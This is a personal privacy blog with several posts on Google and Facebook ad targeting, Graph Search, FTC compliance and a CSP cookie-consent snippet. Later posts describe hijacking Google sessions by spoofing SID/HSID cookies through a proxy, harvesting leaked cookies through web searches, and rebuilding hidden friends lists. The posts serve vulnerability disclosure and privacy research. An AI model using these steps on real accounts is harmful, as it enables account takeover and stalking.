About Vincent Toubiana

I'm an IT Expert at CNIL (the French DPA) and a former NYU PostDoc who maintains and develops the TrackMeNot extension. On this blog I'll express my personal opinion about search engines and how they handle privacy issues.

The missing clauses in Google’s “Customer Match”

In September Google announced “Customer Match”, a new tool for advertisers to target their existing customer using their email addresses. “Customer match” is almost like Facebook’s “Custom Audiences” but Google and Facebook seem engaged in “a privacy race to the bottom” and Google may have taken the lead.

Targeting email addresses

Advertisers aim at targeting prospects and existing customers. While remarketing offers them the opportunity to target potential buyer, advertisers were so far not able to differentiate between their existing  customers and new prospects. They also lacked the possibility to target their “loyal” clients (i.e. those who have subscribed to a loyalty card) because there is no link between the cookie IDs assigned to their browser by ad-networks and their loyalty card number or even their online customer account. “Custom Audience” and “Customer Match” (thereafter “Customer targeting”) create a bridge between the email addresses  used to create a “Best Buy” account or CVS loyalty card and Google and Facebook accounts.

Via “Customer targeting”, advertiser will be able to pull the information they gathered about your shopping habits and leverage it to target you on Facebook and on Google. The advertiser won’t send directly ads that they want to show you and attach it to your address. Instead they will create group of “audiences” by creating groups of email addresses of  their customers. They will send those hashed email addresses to Facebook (or Google) which will check to see if those hashed email addresses match those of registered users.

Technically, Facebook does not see the email address but just the hash. So if you’re not in their user database they will not be able to know that you’re a “Best Buy” customer. That being said, the technical guarantee may not be sufficient considering the computational  resources of giants like Google and Facebook that could generate many hashes to brute force the hashed email address and retrieve the lists of customers. In fact, in another context Google seems to admit this and required that Google Analytics user don’t send hashed identifier like email addresses or phone numbers.

Therefore the only guarantees are contractual; they are the engagements that Google and Facebook take when they receive email addresses (or phone numbers). Facebook and Google are committed to not retrieving the email addresses of people that are not registered to their services. Similarly their contractual clauses prevents them from keeping those lists of hashed identifiers for more than a week (that would remain largely enough for them to break most of them).

Facebook ToS

Facebook Terms of Service are quite constraining for Facebook itself as they more or less prohibit Facebook from doing anything with the hashed email addresses other than using them to help an advertiser reach its audience. Therefore, Facebook cannot add information to the profile of its users. In fact Facebook specifically forbid appending “Custom Audience” data to users’ profiles. Furthermore, Facebook won’t let an advertiser target the audience of another advertiser. For instance “Target” should not be capable to target “Best Buy” customers. Facebook adopts a data processor position with respect to Custom Audience, the advertiser being the data controller.

Except of "Custom Audience ToS" https://www.facebook.com/ads/manage/customaudiences/tos.php

Except of “Custom Audience ToS” https://www.facebook.com/ads/manage/customaudiences/tos.php


Google Customer Match

Google took another approach with its service. Google did not include clauses to prevent them from appending “Customer Match” data to user’s profiles. The restrictions only impact the list of email addresses , but there is no restrinction on the use of the list of matched profiles which can therefore be used by Google.

Customer Match conditions from https://support.google.com/adwords/answer/6276125

“Customer Match” conditions from https://support.google.com/adwords/answer/6276125


In fact, Google implicitly admitted that these data will be appended to user profiles when it modified its Privacy Policy in August to include data obtained from partners in Google Accounts data.While the change remained unnoticed then, it became clearly more critical after “Customer Match” was announced.

Change made to google's privacy policy on August 19th

Change made to Google’s privacy policy on August 19th


Consequences of Google posture

Google’s decision to include “Customer Match” data in its user accounts will impact user’s privacy and also advertiser’s competition.

  • Since the data will be included in the account, it means that Google will have a more comprehensive view of its users which is a big step to merge offline and online data (also known as data onboarding). This may have significant negative impact as it puts Google at the center of all these data-flows… until Facebook announces its riposte.
  • On the up-side, this could be beneficial for transparency because users could be made aware of the advertisers targeting them if Google shows these data on privacy dashboards (that’s a big if).
  • However, because Google is a data controller with respect to ‘Customer Match”, advertisers may be reluctant to share information about their customers knowing that it could potentially be re-used by competitors or by Google itself. Not only Google could share these data with other advertisers, thus allowing competitors to target each others audience to stir-up the demand and thus the price, but Google could also be tempted to use the data for its direct benefit.


Thanks to Armand Heslot for providing feedback on a draft.

Implementing cookie consent with “Content Security Policy”

In this post I briefly explain how “Content Security Policy” could be used to enforce the cookie consent regulation by blocking third parties content.

Cookie Consent

EU cookie regulation imposes to website editors to obtain the informed  consent of visitors before setting cookies. Therefore, a website should first check that it has consent before dropping its own (unnecessary) cookies and so should the third parties that are called by the website. While it’s fairly simple for a first party to check that it has obtained consent (e.g. storing the consent in a cookie) third parties are in a different situation because they cannot read the first party cookies to deduce if consent has been granted.
Therefore the responsibility sort of shift to the first parties which are in a position to inform and obtain consent; yet they have to prevent third parties from setting cookies as long as consent has not been obtained. Tag managers are elegant solutions that can be deployed to do that. A less elegant solution is to rely on “Content Security Policy” to prevent external resources setting cookies from being loaded by the browser.

Overview of Content Security Policy

A “Content Security Policy” is a “declarative policy that lets the authors (or server administrators) of a web application inform the client about the sources from which the application expects to load resources”. This policy can be viewed as a white list of resources that can be loaded by the browser when requesting page. Content security policies can be conveyed in two forms, either through an HTTP header or in a http-equiv meta tag in the header of the HTML document .

Implementation of the policy

To comply with the cookie consent regulation, a website may simply use a “Content Security policy” to block any third party from loading content and subsequently setting cookies as long as consent has not been granted. Notice that this solution is not specific to cookies; it prevent all types of resources from being loaded thus effectively preventing all types of fingerprinting by third parties.
A quick “cookie consent” implementation is to set to check when a GET request is received if the “consent” cookie is set and to adapt the “Content-Security-Policy”: if consent has not been granted block all third parties, otherwise set the usual policy.
The easier implementation is to use JavaScript to insert the http-equiv tag in the HTML (although this is not recommended), website editors can just add the following JavaScript tag in their pages and that should do the trick:

if ( document.cookie.indexOf('hasConsent') < 0 ) {
 var hostname = window.location.hostname;
 if (hostname.indexOf("www.") ===0) hostname = hostname.substring(5);
 var meta = document.createElement('meta');
 meta.httpEquiv = "content-security-policy";
 meta.content = "script-src 'self' 'unsafe-inline' *." + hostname + "; img-src *." + hostname + "";

A slightly more complicated solution is to set the HTTP header. The code is fairly similar but the complexity depends of the type of server you’re running. If you’re using PHP, you could do it like that:

if(!isset($_COOKIE["hasConsent"])) {
 $allowed_hosts = "*.unsearcher.org";
 header("Content-Security-Policy: script-src 'self' 'unsafe-inline' " . $allowed_hosts . "; img-src 'self' " . $allowed_hosts);

Browser Support

Content security policy is still a working draft document so the feature is not supported equally by all browsers. As far as I can tell, Chrome and Safari implement all the required features, including support of the http-equiv tag. Firefox enforces policies that are set through the header but there is currently no support of the http-equiv tag. Finally Internet Explorer offers only very limited support of CSPs through  iframe sandbox property.


I’ve used BURP proxy to preview what websites would look like with content security policies blocking third parties, here are the results :


Content-Security-Policy: script-src 'self' 'unsafe-inline' *.lemonde.fr *.lemde.fr; img-src *.lemonde.fr *.lemde.fr

Content-Security-Policy: script-src ‘self’ ‘unsafe-inline’ *.lemonde.fr *.lemde.fr; img-src *.lemonde.fr *.lemde.fr

Content-Security-Policy: script-src 'self' 'unsafe-inline' *.nytimes.com *.nyt.com; img-src *.nytimes.com *.nyt.com

Content-Security-Policy: script-src ‘self’ ‘unsafe-inline’ *.nytimes.com *.nyt.com; img-src *.nytimes.com *.nyt.com

Content-Security-Policy: script-src 'self' 'unsafe-inline' *.slashdot.org  *.fsdn.com; img-src *.slashdot.org  *.fsdn.com

Content-Security-Policy: script-src ‘self’ ‘unsafe-inline’ *.slashdot.org *.fsdn.com; img-src *.slashdot.org *.fsdn.com



This solution is far from perfect, the main reason is that it is not supported by all browsers. Yet it provides a simple solution for website editors to block third party resources until  consent is obtained. Such solution is complementary to the tags provided on CNIL’s website that can be used to obtain consent before setting Google Analytic first party cookies.

Impact of Google privacy policy on web tracking

Google most important privacy policy changes happen almost two years ago. The change was announced as a clarification of the policies which will mainly be used to simplify and improve services. Now that the changes are effective, it is interesting to observe what the consequences of the new policy are and what has changed. In this blog post I focus on Google tracking capabilities and show that the changes allow Google to improve significantly the way it tracks users on the web.

The claim about DoubleClick cookie information

One of the few protective claims Google made in its policy was that “[they] will not combine DoubleClick cookie information with personally identifiable information unless we have your opt-in consent”. Some understood that Google would not combine information from the Google Account with information from DoubleClick ad-network, but that was not the case.

Using information from the Google profile

As a matter of fact, Google has so far combined many pieces of information from its ad network with information obtained from Google profiles. Your age and gender have already been shared with DoubleClick advertisers for many months now as shown on Google Ads Setting page. At the beginning, these data were shared on an opt-in basis through the “+1 personalization page”. It was not obvious that his page controlled how information from your profile was shared with advertiser as this was only mentioned as “+1 and other profile information”.

This page shows part of the information advertisers can use to target you.

The “+1 personalization” (see below) page has been removed when Google announced “ad endorsement” and now the URL of the page redirects to the ad-endorsement page. As a matter of fact, it is no longer possible to opt out of ads on the web be based on your Google profile without opting out of all interest based ads.

This page was buried in Google+ settings and was removed when Shared Endorsement was announced.

This change came with no announcement, because the privacy policy only prevents Google from combining PII from the Google profile.

Ad customization based on visited website

The policy does not prevent Google from associating your visits on websites affiliated to DoubleClick to target your Google profile. As a matter of fact, your Google account can be retargeted by DoubleClick affiliated websites you visited. This feature — called Remarketing list for search ads – lets advertisers retarget previous visitors on Google Search.

Technically, Google cannot recognize when a user visited a site web affiliated to DoubleClick because the domains associated to the cookies are different. When you’re doing a search on Google, Google reads only cookies attached to “google.com” domain, whereas on Google Display Network (i.e. the set of websites with DoubleClick ads) cookies are attached to the doubleclick.net domain. Google knows the DoubleClick cookie ID of people who visited a website on Google Content Network but it does not know their Google ID. This is problematic because when you do a search on Google, you do not reveal you DoubleClick ID but just your Google ID. So when you do a search, Google cannot know if you’ve visited a website which does retargeting.

To solve this, Google redirects your browser from the doubleclick.net domain to the google.com domain. When you visit a website which wants to retarget you, DoubleClick redirects you to google.com domain and Google adds your Google ID to the list of persons who visited the advertiser’s website. Next time you’ll do a search Google will recognize your Google ID and retarget you with ads for the website you visited. The figure bellow explains how Google records that a user visited the website ABC (you can capture the actual frames on worldstore.co.uk).

Through this process, Google associates the list of websites affiliated to Google Display Network (it means with a DoubleClick tag) you visited to your Google ID. Consequently, part your web browsing history (the part containing websites which do remarketing) is actually combined to your Google profile and you cannot review it. Notice that Google never proposed a way to know which website you visited and try to retarget you, but while Google could have claimed that your browsing history was only associated to you “anonymous” DoubleClick ID, it is now attached to your personal Google account.

Summary of what Google can combine with DoubleClick

To summarize, Google cannot combine personally identifying information from your Google account with you DoubleClick cookie information, yet it can:

– Use information from your Google account (age, gender and probably very soon a list of your interests) to personalize ads that you see on DoubleClick affiliated website
– Link visits on DoubleClick affiliated websites to your Google profile and retarget you when you do a search on Google.

In the end, Google privacy policy with regard to advertising is well summarized on this page:

  • “[They] don’t share personally identifiable information with advertisers.
  • [They] don’t allow advertisers to show ads based on sensitive information, such as those based on race, religion, sexual orientation, health or sensitive financial categories.”

In the next page, I consider how Google combines information from Google profile and DoubleClick with data obtained though Google Analytics.

Facebook may violate the FTC settlement in a few days

Update: Facebook started to show the announced prompt and ask for user consent.

Almost a year after it removed the option for 90% of its members, Facebook informed on Wednesday the remaining 10% that they’ll remove the “Who can search my timeline by name”  setting in a few days. Removing this setting si likely a violation of the 2011 FTC settlement.

Timeline concealed to the public

A month ago Facebook announced that they’ll prompt user to get their consent before removing the setting [1] but they finally decided to just inform users with an email and a very short notice displayed above the News Feed.


In the mail sent to its members, Facebook argues that when they created this setting “the only way to find [them] on Facebook was to search for [their ]specific name. Now, people can come across [their] Timeline in other ways: for example if a friend tags [them] in a photo, which links to [their]Timeline, or if people search for phrases like “People who like The Beatles,” or “People who live in Seattle,” in Graph Search”. However, I’m confident that some users – including me — are not tagged in public photo, do not like public content and have no friend whose “friends list” is public.

Timelines of these users will not appear in public Graph Search results Facebook and there is no public link that could be used to find them. As a matter of fact, people who are not my friends (or friends of friends)  can’t even know if I have a Facebook account. As for today, the only solution to find my Facebook Timeline is to test the 1.2 billion userID numbers. In addition to be time consuming, this exhaustive search would violate Facebook Terms of Services.

Private vs Nonpublic

A Timeline page is public because any user can load its content but Timelines URLs (i.e. usernames) are not public since not anyone can find them: without the search functionality, it is not possible to retrieve the Timeline associated to a specific user. Timelines URLs are like unlisted phone numbers or Google Docs shared with “anyone with the link”. These documents may not be seen as private but I would not define them as public (i.e. I’d be unpleasantly surprised to see them used in an endorsed advertisement). I do not claim that Timelines are private, only that they are “nonpublic user information” .

Why Facebook could violate the FTC settlement

The FTC settlement does not focus on user private information but cover the entire nonpublic user information (e.g. a user ID to which access is restricted by a privacy setting). Indeed, Section II-A of the 2011 settlement requires that Facebook “prior to any sharing of a user’s nonpublic user information by [Facebook] with any third party, which materially exceeds the restrictions imposed by a user’s privacy setting (s), shall […] obtain the user’s affirmative express consent”.

Facebook will not only remove the possibility to select who can look-up timelines, they will set the setting to its default values “Everyone”. Hence, Facebook will modify settings of users who set it to a more restricted audience. Obviously the two lines message Facebook displayed and the email they sent to the affected members does not offer a valid solution to get an affirmative express consent. So Facebook will certainly violate the FTC settlement in a few days.

[1] Coincidentally, Facebook made this announcement about 5 hours after I tweeted that they should get an informed consent.


Your hidden friends, betrayed by their like

Graph Search as a privacy tool

According to Facebook, Graph Search not only helps people finding information about their friends, it also helps them to know what information they reveal about themself. I find this objective questionable especially in France where many people are still not aware that Graph Search even exist [1] and yet have their profiles searchable by anyone in the US. Yet, Graph Search is certainly very useful and educative about what could go wrong with tagging and shared content.

The issue of the Friend List

When Facebook announced Graph Search in January, I was surprised by their decision to not show friends lists that could be recomposed by browsing timelines. Recomposing part of someone friends list was time consuming but possible if you spent time scrolling down the timeline.

Last July update of Graph Search makes it even simpler to retrieve list of friends of people who hide it. Indeed, Graph Search now allows you to search who liked or commented on photos. Since some content is only visible to my friends, only they can comment or like my pictures. Having a list of people who liked or commented on my photos is like having a list of my friends with who I share things on Facebook. Some people that I do not know commented on my photos, but that’s a negligible fraction.


Unwanted side effects

Surprisingly, it seems that you can even know if someone liked a photo you don’t have access to. Indeed, in some circumstances, you cannot see which picture has been liked; you only know that someone liked a picture (see bellow). It goes against Facebook claim that Graph Search only gives you access to information you already had.

Update: In fact, the person who liked the picture is not searchable but she appears in the search results because she liked a public photo.


The picture liked by the first person is accessible, not the second one

Another annoying effect is that queries like “People who liked photos by me” returns a list of people with who I’m no longer friend. And it’s pretty easy to spot these people because they are systematically at the end of the result list.

How bad is it?

To measure the fraction of the friend list that could be retrieved through Graph Search, I listed the number of results that were listed when I search for:

  • Q1 :“People who liked photos by X”
  • Q2:“People who commented on photos by X”
  • Q3:”People who uploaded photos liked by X”
  • Q4: “People who uploaded photos of X”

Unfortunately, Graph Search does not (yet?) support ‘OR’ queries so there is no easy way to quantify the overlap between these four queries . I reported numbers of confirmed retrieved friends (using the “mutual friend” filter) and  the total number of retrieved people because it also includes former friends. I compare that to the number of friends I have (and I thank my friends who did not hide their friends list).

X Q1 Q2 Q3 Q4 N Friends Ratio
me 59 ( 73)  43 (45)   42(54) 19(20)  207 28.50%

I made some tests on a few  friends and I obtained similar results [2], queries Q1 and Q3 are the more effective queries in general. On average, Graph Search returns 30% of friends, plus some former friends. I guess I could retrieve up to 40-50% by combining the four queries. It’s problematic because many people assume that their friend’s lists are safe, but this safety goes away when they share likable photos or when they like photos.

Since “Like” visibility is public, you can even retrieve some friends of people with who you have no connection. I can imagine many circumstances where having your list of friends publicly available is very problematic.

What can you do?

Unfortunately, you cannot prevent your friends from liking content you share with them. Likes are not like tag or comments: they cannot be removed. The only current solution is to not share “likeable” content or to ask to people to not like it, but that’s very counter intuitive on Facebook. In the end, you can only hide friends who don’t “like” you.

Another solution is to obfuscate the list of people who liked your pictures. I probably rely too much on obfuscation, but asking people you don’t know to like your photos is currently the only technical solution to prevent stalkers from quickly retrieving your friends.

: Thanks to my stalked friends who do not share their friends lists, they motivated this post. Thanks to those who do share their list, they helped me to make this post relevant.

[1] If you have not yet enabled “Graph Search”, I recommand you to do so. See http://www.fredzone.org/comment-activer-le-graph-search-de-facebook-929

[2] I’ll post more results when I’ll get their consent

Facebook Graph Search: Showing what is not Shared

When Facebook announced Graph Search, they emphasized that they designed it with privacy in mind and yet made two different statements. First, M. Zuckerberg said that it’ll give access only to « things that people have shared with you »   while T. Stocky said that «[you] can only search for what [you] can already see on Facebook».
I define the « content I share with you» as the content you can see on my timeline which is in fact a subset of the content you could see about me on Facebook. But Facebook has a different definition and considers « content shared » as everything about me that is visible, even if it normally requires a considerable effort to find it.

Finding pictures with Graph Search

Facebook made it clear that hiding photos on your timeline is no longer enough to prevent people from seeing them. With graph search, it’s now very simple to find all the photos of someone that are visible to you.
For instance, if one of your friends is tagged on pictures that he decided to remove from its timeline, these “hidden” photos will appear in graph search if you have access to them.
It was already possible to find « hidden » pictures a friend was tagged on but it required a considerable amount of time and effort: you had to go through the list of all his friends and check their pictures in case your friend might appear on some of them. Unless you were really creepy, your friends were safe to assume that most of their « hidden » pictures would not be viewed by you. That’s no longer the case and to control who can see your “hidden” pictures you’ll have to delete tags or ask your friends to limit the pictures visibility .

Removing tag is not the solution

Tags is not only a feature used to annotate content, it’s also used to know when someone comments a picture you appear on.  If you delete the tag, you lose the possibility to quickly know how people react to a photo. Not removing a tag is different than sharing a picture. Assuming that people want to share every picture they’re tagged on is wrong, especially when they’re a « share » button that allows them to do precisely that.
Unlike posts on your timeline, tags don’t have to be reviewed before they appear in Graph Search. To control photos of you that will appear in graph search, you have to frequently visit Facebook and remove unwanted tags. You have no option to proactively control your image on Facebook other than relying on your friends to not tag you without your consent.

The case of friends list

Strangely Facebook did not adopt the same definition of “sharing” with the “Friends list”. Assuming we’re friends; if you’ve decided to hide your friend list from your timeline, I can try to recompose it by visiting each of your friend’s timeline and check that you appear as a mutual friend. It would require knowing some of your friends first, but that’s fairly easy if they posted something on your timeline. By iterating this process, I could retrieve a subset of your friends. Like photos you are tagged on, this subset is presumably shared by you but won’t appear if I search for the list of your friends.

Google’s Ad Targeting under the new Privacy Policy

Google new privacy policy will be effective starting March the 1st. The Electronic Frontier Foundation (EFF) suggests to delete your Web Search History, and I strongly recommend to follow this advice because:

1)      The searches that have been recorded in your Web Search History before March the 1st will be subject to this policy [1].
2)      Advertisers could target ads based on your browsing interests and interests inferred from your Web Search History.

The Good Points

First, I have to say that Google did a remarkable job advertising the new policy: notifications are everywhere. I don’t remember any of the policy updates being that much advertised and then commented.

Another good point is that many privacy policies have been merged in one privacy policy. It is no longer required to have a dozen tabs opened to have a good view of the policy. However, you still need to have an extra tab on the FAQ page with the definitions required to understand the Policy. Google could have used the empty space in the right column to display these definitions (like search result previews).


The really bad one

So much for the good points, now let’s discuss the policy itself. The bottom line is this policy would allow advertisers target you based on your web search profile and other interests you expressed in your emails or through your use of Google services. And this list of interests can be combined with the list of interests they built based on your DoubleClick cookie.

Google does not need our Opt-in consent to combine your web search profile to your DoubleClick cookie information. Starting March the 1st, Google could adopt a solution similar to what is deployed by Microsoft to target ads based on your search interests, although a sentence in the policy seems to prevent such use of your data:

“We will not combine DoubleClick cookie information with personally identifiable information unless we have your opt-in consent.”

In fact, it means that your Double-Click cookie will not be linked to your personally identifiable information. So Google can not put your name in front of the list of interests they inferred from your browsing behavior and will not put your name (or any other PII) in the ads you see. Because your Web Search history is likely to be unique, it identifies you and therefore can not be combined to your DoubleClick profile [2].

But your search profile (i.e. the list of interests inferred from your search history) is unlikely to be unique and therefore does not identify you so Google can combine it with your DoubleClick cookie information [2]. I believe they could also include some the of search results you clicked on to retarget you.

Similarly, your age, gender and interests expressed during Gtalk and Gmail discussions (or any other interest that Google could infer but that you would not be the only one to express) could be associated to your DoubleClick cookie. If you have any suggestion to deal with these data, do not hesitate to share it.

[1] See Google Policy FAQ: “Our new Privacy Policy applies to all information stored with Google on March 1, 2012 and to information we collect after that date.”
[2] Google defines Personal information as information “you provide to us which personally identifies you, such as your name, email address or billing information, or other data which can be reasonably linked to such information by Google”.

A list of Google services vulnerable to Session hijacking

After finding an information leakage in Google Search, I’ve been curious to see if there were no other pieces of information that could be gleaned from other Google services. To verify this, I visited my Google Dashboard, replaced my SID cookie and clicked on all the HTTP services that were listed.
My first attempt failed as I was systematically redirected to the account page where I was asked to enter my password. I then tried to also spoof the HSID cookie — also sent clear text — but because HSID cookie is an HTTPOnly cookie [1], it cannot be modified by a script or by the user: the cookie can only be modified by the server.

Spoofing HTTPOnly cookie

The best solution I found was to install a local proxy to intercept the HTTP traffic and then modify the cookies (I recommend Burp free edition which does a good job). It is then quite simple to replace the HSID cookie in the sent requests.
This time it worked, I was able to log into two services under with the spoof account:

  • Google Alerts: I was able to view and edit the mail alerts that were configured for the spoofed account.
  • Google Social Content: This service lists all your Gtalk contacts (that means most of the people you chatted with a couple of times).
  • Google Contacts: This is the Gmail contacts manager, it allows you to view, edit and create Gmail contacts. Quite useful if you want to get a list of persons to spam. An attacker could also attempt to replace the mail address of a contact with its own mail address.
  • Google Reader: You could see and edit RSS subscription.
  • Google Maps : You could see the maps associated to the spoof account.

There might be other vulnerable services but I think this list is already quite exhaustive and each of the listed service is likely to provide sensitive information.

Design flaws

Spoofing an unsecured cookie to hijack a session is nothing new. Nevertheless, there are two design flaws that HSID and SID cookies spoofing more critical:

  • These cookies can be used to provide an access to multiple services: when Google created these services, it did not assign a specific cookie for each of them. Therefore a single pair of cookies provides an access to all these services.
  • SID cookies are still valid even after the user logout: if a user thinks his session has been compromised, there is nothing he can do to revoke it. It seems that this was already pointed out 4 years ago .


Google is working on these issues and they should be fixed soon (users are already redirected to encrypted search [2]). Therefore, a next step would be to check if other major Web service providers have a better cookie policy.

[1] Jeff Atwood, “Protecting Your Cookies: HttpOnly”, http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html
[2] Evelyn Kao, “Making search more secure”, http://googleblog.blogspot.com/2011/10/making-search-more-secure.html

Searching session cookies and click-streams

In our paper on Google’s session cookie information leakage, Vincent Verdot and I described how to captures SID cookies on a shared network and run the attack with Firesheep (see the previous post).

Nevertheless, there are other ways to capture such cookies. For instance one could use malware to capture search traffic, but the simplest solution remains to search SID cookies.

Redirecting traffic

Using a malware to redirect the traffic of infected computers through a proxy controlled by the attack would allow to capture session cookies. Such infection has recently been detected by Google which displayed a banner on its search page [1]. In that particular case, Google traffic redirection was merely a side effect which triggered the malware detection.

According to Google, a couple of millions of computers [1] were infected by this malware. Attackers could have captured a significant number of session cookies and run attacks described in our paper.

Googling for cookies

The simpler solution to find SID cookies is to search them. Typing the right query in Google provides a list of pages where people published captured HTTP traffic, including SID cookies (also works with Yahoo!).

If you replace your SID cookie by one of the cookies listed in these pages, you will receive the same personalized results than its owner. From these results you can quickly extract a list of visited results, Gmail contacts and Google+ acquaintances.

Not all these results contain full SID cookies and some of the listed SID cookies may have already expired, but this simple search should already provide many valid cookies to test the flaw. I’ve written a Chrome extension to simply replace the SID cookie for the “google.com” domain and quickly test different accounts. Once installed, click on the red button in the upper right corner, past the cookie value and click save.
On Firefox you could use the Web Developer extension to edit cookies (it does not seem to work on Firefox 5.0).

Linking data and PI

By publishing their (apparently innocuous) cookies users indirectly published part of their click-stream and associated it to their email address. Thus they established a public record of having visited these URLs [2], and this record is now linked to their name. From there, their full anonymized click-stream — not reduced to visited search results — could be de-anonymized by a tracking ad-network.


[1] Damian Menscher, “Using data to protect people from malware”, http://googleonlinesecurity.blogspot.com/2011/07/using-data-to-protect-people-from.html
[2] Arvind Narayanan, “There is no such thing as anonymous online tracking”, http://cyberlaw.stanford.edu/node/6701